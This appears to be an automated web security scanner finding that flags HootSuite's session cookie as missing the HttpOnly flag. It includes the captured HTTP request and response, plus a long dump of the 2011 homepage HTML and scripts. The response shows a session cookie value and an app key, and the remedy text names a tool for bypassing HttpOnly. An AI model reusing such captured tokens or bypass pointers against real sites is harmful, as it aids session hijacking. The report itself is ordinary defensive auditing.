Interface</h2> <p>Work efficiently with social streams, tabs, and columns -- plus a choice of design themes</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_themes.png" alt="Themes" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_assignment.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Assign Tasks</h2> <p>Fine-tune your team by delegating messages and monitoring responses and progress</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_assignments.png" alt="Assignments" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_schedule.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Scheduled Updates</h2> <p>Optimize delivery by choosing the best time and date to reach your audience </p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_schedule.png" alt="Schedule" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_internationalize.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Internationalize</h2> <p>Feel comfortable with language localization in Japanese, French and Italian (more languages to come)</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_international.png" alt="International" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_mentions.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Monitor Mentions</h2> <p>Gather intelligence by tracking mentions of your brand, industry, or search terms</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_mentions.png" alt="Mentions" /> </a> </div> </div> </div> <a class="slideRight" href="#">Right</a> </div> <div class="buckets"> <div class="users"> <h2>Hoo's Using HootSuite?</h2> </div> <div class="blog"> <h2>HootSuite Blog</h2> <ul class="messageList"> <li><a href="http://blog.hootsuite.com/hoottip-adding-lists-in-web/">#HootTip: Adding Lists In Your Web Dashboard</a></li><li><a href="http://blog.hootsuite.com/corporate-social-media-white-paper/">Business Social Media Report ~ HootSuite Partners with Useful Social Media for Corporate #WhitePaper</a></li><li><a href="http://blog.hootsuite.com/hootsuite-blackberry-linkedin-foursquare-facebook-twitter/">HootSuite #BlackBerry update: Now Free with Linkedin, Foursquare, Facebook and Twitter</a></li><li><a href="http://blog.hootsuite.com/hoottip-re-tweet-style/">#HootTip: Change your Re-Tweet Style on the Fly</a></li><li><a href="http://blog.hootsuite.com/hootsuite-facebook-pages/">HootSuite Updates Facebook Pages ~ Do more from the Dash</a></li><li><a href="http://blog.hootsuite.com/twitter-suspensions/">Inside Information on Recent Twitter Suspensions</a></li> </ul> </div> </div> <div id="aboutImagePopup" style="display:none;"></div> <script type="text/javascript">$(document).ready(function () { var itemTotal = $('div.slider .unique .item').size(); var itemWidth = $('div.slider .unique .item:first').outerWidth(); var itemsWidth = (itemTotal*itemWidth); var slideActive = 1; $('div.slider .unique').width(itemsWidth); $('div.slider').width(952);//ie6 fix tried container.width but still breaks var holderWidth = $('div.slider .itemHolder').outerWidth(); currentPos = 0; $('div.slider .unique').clone().prependTo($('div.slider .itemHolder')); $('div.slider .items:first-child').addClass('clone').removeClass('unique'); $('div.slider .clone').css('margin-left', (itemTotal*itemWidth)*-1); $('#homePageMemberLoginForm input#loginEmail').focus().select(); function slideTimer() { if (hs.timers.homeSlideTimer != undefined) { clearTimeout(hs.timers.homeSlideTimer); delete hs.timers.homeSlideTimer; } hs.timers.homeSlideTimer = setTimeout(function(){ if(!slideActive){return;} else { $('a.slideRight').click(); } }, 6000); } slideTimer(); $('a.slideLeft').click(function (e) { if($('div.slider .unique:animated').length <= 0) { targetPos = currentPos + itemWidth; currentPos = targetPos; $('div.slider .unique').animate( { marginLeft:targetPos }, 700 ); $('div.slider .clone').animate( { marginLeft:(targetPos-itemsWidth) }, 700, sliderContinuity ); } slideTimer(); e.preventDefault(); }); $('a.slideRight').click(function (e) { if($('div.slider .unique:animated').length <= 0) { targetPos = currentPos - itemWidth; currentPos = targetPos; ..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /

/ CONFIRMED

http://hootsuite.com/

Identified Cookie

_SID

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hootsuite.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:23:03 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: _SID=aeddf69c6dd7c69b4152973210ce56a723f86f74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 29
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="ie=edge,chrome=1"> <meta name="keywords" content="HootSuite, Social Media Dashboard, Multiple Twitter Accounts, Corporate Twitter, Scheduled Tweets, Twitter Multiple User, Customized Twitter Layout, Twitter Stats" /> <meta name="description" content="HootSuite - Social Media Dashboard. With HootSuite, you can monitor keywords, manage multiple Twitter, Facebook, LinkedIn, Foursquare, Ping.fm and WordPress profiles, schedule messages, and measure your success." /> <link rel="apple-touch-icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/apple-touch-icon.png"/><meta name="application-name" content="HootSuite"/><meta name="application-url" content="http://hootsuite.com"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_128x128.png" sizes="128x128"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_48x48.png" sizes="48x48"/><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_32x32.png" sizes="32x32"/><link rel="shortcut icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/favicon.ico" /><link rel="icon" href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/hs_16x16.png" sizes="16x16"/> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/base.gz.css" type="text/css" rel="stylesheet" /> <!--[if IE 7]> <link href="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/css/ie7.gz.css" type="text/css" rel="stylesheet" /> <![endif]--> <title>HootSuite - Social Media Dashboard for Teams using Twitter, Facebook, Linkedin</title></head> <body> <!--[if IE]> <a name="#" href="#"></a> <![endif]--> <script type="text/javascript">
var hs = hs || {};
hs.timers = new Object();
hs.prefs = new Object();
hs.c = new Object();
hs.c.rootUrl = "http://hootsuite.com";
hs.c.rootUrlSSL = "https://hootsuite.com";
hs.c.imageUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images";
hs.c.swfUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/swf";
hs.c.jsUrl = "https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js";

hs.c.reportHeaderImageUrl = "https://d2l6uygi1pgnys.cloudfront.net/report_header_image/production";

hs.c.jsTemplateRootUrl = ('https:' == document.location.protocol.toLowerCase() ? hs.c.rootUrlSSL : hs.c.rootUrl) + '/js/internal/templates/';
hs.c.tweetPageSize = 30;
hs.prefs.language = '';
hs.timezoneOffset=null;
hs.memberId=null;
hs.socialNetworks=[];
hs.socialNetworksKeyedByType=[];
hs.memberAutoInitial="";
hs.prefs.isNotifyNewTweet=0;
hs.prefs.isNewRetweet = 0;
hs.prefs.theme = '';
hs.prefs.allowSlimStreams = false; // TODO: replace with value from DB
hs.languagePack = {};
hs.gp = 0;
hs.fbAppKey="e0bebeb3a55265b11821edce13e316fe";
hs.fbChannelPath="http://hootsuite.com/xd_receiver.htm";
hs.fbFanpageId="177463958820";
</script>

<script type="text/javascript" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/js/hs.gz.js"></script>
<div id="statusContainer" style="display: none;position:absolute;"> <div class="statusMessage rb-a-4"><span class="_statusMsgContent"></span></div></div> <div id="container" class="home"> <div id="content"> <div class="header"> <h1><a href="http://hootsuite.com"><img src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home_logo.png" /></a></h1> <a id="loginButton" class="btn-glass" href="#" tabindex="1">Login&nbsp;<span class="icon-19 expand"></span></a> <div id="loginBox" class="rb-a-5 offScreen"> <div id="openId">
<script type="text/javascript">
$().ready(function() {
openid.init('openid_identifier');
});
</script>

<form id="openid_form" action="https://hootsuite.com/openid-start" method="post" >
<div id="openid_choice" style="display: block; ">
<h3>Login or Signup with OpenID</h3>
<p>Select one of these third-party accounts:</p>
<div id="openid_btns"></div>
</div>
<div id="openid_input_area"></div>
</form>
</div> <div id="secureId" class="rb-a-4"> <form name="memberLoginForm" id="homePageMemberLoginForm" method="post" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login"> <h3>Login</h3> <span class="formError"></span> <span class="formError"></span> <span class="formError"></span> <label class="emailInput defaultTextInput title" for="loginEmail"> Email Address: </label> <input id="loginEmail" type="text" name="loginInfo[email]" maxlength="100" tabindex="2" /> <label class="passInput defaultTextInput title" for="loginPassword"> Password: </label> <input id="loginPassword" name="loginInfo[password]" type="password" tabindex="3"/> <p class="forgotPassword"><a href="retrieve-password" tabindex="4"><strong>Forgot Password?</strong></a></p> <p class="remember"> <label class="title"><input class="checkbox" type="checkbox" name="loginInfo[rememberMe]" checked="checked" tabindex="5" />&nbsp;Remember Me</label> </p> <div class="btns-last"> <a class="btn-cmt _submitLogin" href="#" onclick="hs.throbberMgrObj.add('._submitLogin'); $('#homePageMemberLoginForm').submit(); return false;" tabindex="6">Secure Login</a> </div> <input type="hidden" name="redirect" value="" /> <input type="hidden" name="form_submit" value="Login" /> </form> </div> <script type="text/javascript"> /* $('#loginButton') */ $('#loginButton') .bind('click', function() { return false; }) .bind('mousedown', toggleLoginBox) .bind('focus', function(e) { setTimeout(function() { if ($('#loginBox').is('.visHide')) { // not already visible toggleLoginBox(e); } else { // already visible, do nothing } }, 1); }); function toggleLoginBox(e) { e.preventDefault(); $('#loginButton').toggleClass('btn-glass-dropdown'); $('#loginButton').find('.icon-19').swapClass('collapse','expand'); $('#loginBox').toggleClass('offScreen'); setTimeout(function() { $('#loginEmail').focus(); },1); return false; } </script> </div> </div> <div class="title"> <h1>Social Media Dashboard</h1> <a class="signup" href="https://hootsuite.com/signup">Sign Up Now</a> </div> <div class="slider"> <a class="slideLeft" href="#">Left</a> <div class="itemHolder"> <div class="items unique"> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_networks.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Spread Messages</h2> <p>Update multiple networks in one step, including Twitter, Facebook, LinkedIn, Wordpress.com, and Ping.fm</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_networks.png" alt="Networks" /> </a> </div> <div class="item"> <a href="http://hootsuite.com/mobile" title="View apps page" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Social on the Go</h2> <p>Compose and converse on the go using mobile apps for iPhone, Android, Blackberry, iPad and more</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_mobile.png" alt="Retweet" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_analytics.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Track Results</h2> <p>Review success in real-time with click-through statistics and easy report exporting</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_analytics.png" alt="Analytics" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_team.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Team Collaboration</h2> <p>Manage multiple contributors and share data and access without sharing passwords</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_team.png" alt="Team" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_themes.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Custom Interface</h2> <p>Work efficiently with social streams, tabs, and columns -- plus a choice of design themes</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_themes.png" alt="Themes" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_assignment.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Assign Tasks</h2> <p>Fine-tune your team by delegating messages and monitoring responses and progress</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_assignments.png" alt="Assignments" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_schedule.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Scheduled Updates</h2> <p>Optimize delivery by choosing the best time and date to reach your audience </p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_schedule.png" alt="Schedule" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_internationalize.jpg', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Internationalize</h2> <p>Feel comfortable with language localization in Japanese, French and Italian (more languages to come)</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_international.png" alt="International" /> </a> </div> <div class="item"> <a href="#" title="Enlarge" onclick="showImagePopup('https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/large_mentions.png', 640, 480); return false;" tabindex="-1"> <img class="cta" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/item_btn.png" alt="&raquo;" /> <h2>Monitor Mentions</h2> <p>Gather intelligence by tracking mentions of your brand, industry, or search terms</p> <img class="thumb" src="https://d2l6uygi1pgnys.cloudfront.net/1-9-05/images/static/home/thumb_mentions.png" alt="Mentions" /> </a> </div> </div> </div> <a class="slideRight" href="#">Right</a> </div> <div class="buckets"> <div class="users"> <h2>Hoo's Using HootSuite?</h2> </div> <div class="blog"> <h2>HootSuite Blog</h2> <ul class="messageList"> <li><a href="http://blog.hootsuite.com/hoottip-adding-lists-in-web/">#HootTip: Adding Lists In Your Web Dashboard</a></li><li><a href="http://blog.hootsuite.com/corporate-social-media-white-paper/">Business Social Media Report ~ HootSuite Partners with Useful Social Media for Corporate #WhitePaper</a></li><li><a href="http://blog.hootsuite.com/hootsuite-blackberry-linkedin-foursquare-facebook-twitter/">HootSuite #BlackBerry update: Now Free with Linkedin, Foursquare, Facebook and Twitter</a></li><li><a href="http://blog.hootsuite.com/hoottip-re-tweet-style/">#HootTip: Change your Re-Tweet Style on the Fly</a></li><li><a href="http://blog.hootsuite.com/hootsuite-facebook-pages/">HootSuite Updates Facebook Pages ~ Do more from the Dash</a></li><li><a href="http://blog.hootsuite.com/twitter-suspensions/">Inside Information on Recent Twitter Suspensions</a></li> </ul> </div> </div> <div id="aboutImagePopup" style="display:none;"></div> <script type="text/javascript">$(document).ready(function () { var itemTotal = $('div.slider .unique .item').size(); var itemWidth = $('div.slider .unique .item:first').outerWidth(); var itemsWidth = (itemTotal*itemWidth); var slideActive = 1; $('div.slider .unique').width(itemsWidth); $('div.slider').width(952);//ie6 fix tried container.width but still breaks var holderWidth = $('div.slider .itemHolder').outerWidth(); currentPos = 0; $('div.slider .unique').clone().prependTo($('div.slider .itemHolder')); $('div.slider .items:first-child').addClass('clone').removeClass('unique'); $('div.slider .clone').css('margin-left', (itemTotal*itemWidth)*-1); $('#homePageMemberLoginForm input#loginEmail').focus().select(); function slideTimer() { if (hs.timers.homeSlideTimer != undefined) { clearTimeout(hs.timers.homeSlideTimer); delete hs.timers.homeSlideTimer; } hs.timers.homeSlideTimer = setTimeout(function(){ if(!slideActive){return;} else { $('a.slideRight').click(); } }, 6000); } slideTimer(); $('a.slideLeft').click(function (e) { if($('div.slider .unique:animated').length <= 0) { targetPos = currentPos + itemWidth; currentPos = targetPos; $('div.slider .unique').animate( { marginLeft:targetPos }, 700 ); $('div.slider .clone').animate( { marginLeft:(targetPos-itemsWidth) }, 700, sliderContinuity ); } slideTimer(); e.preventDefault(); }); $('a.slideRight').click(function (e) { if($('div.slider .unique:animated').length <= 0) { targetPos = currentPos - itemWidth; currentPos = targetPos; ..